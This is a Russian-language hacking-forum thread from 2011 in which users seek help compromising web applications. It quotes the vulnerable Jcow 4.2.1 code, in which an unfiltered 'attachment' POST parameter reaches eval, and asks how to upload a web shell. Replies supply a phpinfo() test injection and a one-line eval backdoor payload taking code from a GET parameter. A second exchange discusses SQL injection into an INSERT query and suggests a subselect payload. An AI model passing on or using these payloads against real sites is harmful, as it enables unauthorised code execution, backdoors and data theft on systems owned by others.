ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

13.09.2011, 20:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 60692
Репутация:
6
|
|
alerondel,
если сломаешь напиши в ПМ)))) А вообще как обнаружил, что есть уязвимость?
Nightmarе,
БД есть, но доступ не дают, насколько я помню, либо дают, но платно(дорого)!
|
|
|
|

14.09.2011, 02:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 1470
Репутация:
0
|
|
Помогите залить шелл
Скрипт Jcow 4.2.1. В скрипте присутствует уязвимость - не фильтруется параметр "attachment"
сам код:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'attachment'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]'status'[/COLOR][COLOR="#007700"]) {
include_once([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$c_run[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'::ajax_post();'[/COLOR][COLOR="#007700"];
eval([/COLOR][COLOR="#0000BB"]$c_run[/COLOR][COLOR="#007700"]);
exit;
}[/COLOR][/COLOR]
есть эксплот под metasploit http://www.exploit-db.com/exploits/17722/ Сплойт коннектится к хосту, а вот, как залить шелл, ума не приложу, может кто че посоветует? Спасибо
|
|
|
|

14.09.2011, 03:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от VertuOzz
VertuOzz said:
Скрипт Jcow 4.2.1. В скрипте присутствует уязвимость - не фильтруется параметр "attachment"
сам код:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'attachment'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]'status'[/COLOR][COLOR="#007700"]) {
include_once([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$c_run[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'::ajax_post();'[/COLOR][COLOR="#007700"];
eval([/COLOR][COLOR="#0000BB"]$c_run[/COLOR][COLOR="#007700"]);
exit;
}[/COLOR][/COLOR]
есть эксплот под metasploit
http://www.exploit-db.com/exploits/17722/
Сплойт коннектится к хосту, а вот, как залить шелл, ума не приложу, может кто че посоветует? Спасибо
постом в переменной attachment передай phpinfo();//
|
|
|
|

14.09.2011, 03:55
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Есть инъекция в INSERT INTO
insert into TABLE (id, subid, date, data) values ('666', 'SQL', '', '')
Можно что-нибудь извлечь из этого?
Запрос комментариями не обрезается. MQ off
|
|
|

14.09.2011, 04:01
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от попугай
попугай said:
Есть инъекция в INSERT INTO
insert into TABLE (id, subid, date, data) values ('666', '
SQL
', '', '')
Можно что-нибудь извлечь из этого?
Запрос комментариями не обрезается. MQ off
Вот может тебе эта статейка поможет?!
_http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html
P.S: кинь ссылку в пм глянуть
|
|
|

14.09.2011, 04:05
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от winstrool
winstrool said:
Вот может тебе эта статейка поможет?!
_http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html
P.S: кинь ссылку в пм глянуть
Читал уже. Проблема в том, что нельзя обрезать запрос комментарием как в статье показано.
|
|
|

14.09.2011, 04:19
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме: 1054394
Репутация:
74
|
|
А где-то подсмотреть результаты инсерта можно?
то почему бы просто не сделать вот так?
insert into TABLE (id, subid, date, data) values ('666', ''+(select bla_bla_bla), '', '')
ну и селект не из это же таблицы, помним)
|
|
|

14.09.2011, 11:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 1470
Репутация:
0
|
|
Сообщение от Expl0ited
Expl0ited said:
постом в переменной attachment передай phpinfo();//
Передавал, phpinfo отображается, а дальше чего?
|
|
|
|

14.09.2011, 11:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 124363
Репутация:
11
|
|
Сообщение от VertuOzz
VertuOzz said:
Передавал, phpinfo отображается, а дальше чего?
код выполняй!
попробуй этот
Код:
Code:
eval(stripslashes($_GET[e]));
|
|
|
|

14.09.2011, 12:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 1470
Репутация:
0
|
|
Сообщение от Faaax
Faaax said:
код выполняй!
попробуй этот
Код:
Code:
eval(stripslashes($_GET[e]));
Извиняюсь за нубский вопрос, а что это даст?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|